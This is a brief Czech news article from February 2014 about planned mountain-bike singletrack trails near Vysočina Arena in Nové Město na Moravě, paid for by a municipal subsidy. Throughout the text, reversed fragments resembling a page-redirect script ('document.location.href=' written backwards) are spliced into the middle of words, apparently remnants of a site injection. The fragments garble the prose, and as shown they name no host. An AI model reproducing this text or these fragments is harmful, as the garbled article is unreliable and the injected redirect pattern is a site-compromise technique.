Nové Město na Moravě, aktuality, singltrek
Rainbow page separator

Singltreky začnou budovat v březnu

Sobota, 22. února 2014

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Příští měsíc začnou práce na budování přírodních tras pro horská kola, takzvaných singltreků, v lese Ochoza poblíž novoměstské Vysočina Areny. Veškeré stavební práce by měly být kompletně dokončeny do le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního podzimu.
Na speciální jednosměrné trasy pro horská kola získala novoměstská radnice dotaci ve výši více než třináct milionů korun. Zástupci města si od [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to počinu slibují především zvýšení turistického ruchu v regionu.
V okolí Vysočina Areny budou vybudovány více než dvě desítky kilometrů tras o různých stupních obtížnosti. Od nejtěžších, jež se náročností blíží profesionálním závodním tratím, přes stezky vhodné například pro rodiny s menšími dětmi až po nejlehčí trasu, kterou by mohli zvládnout i tělesně postižení lidé na invalidním vozíku.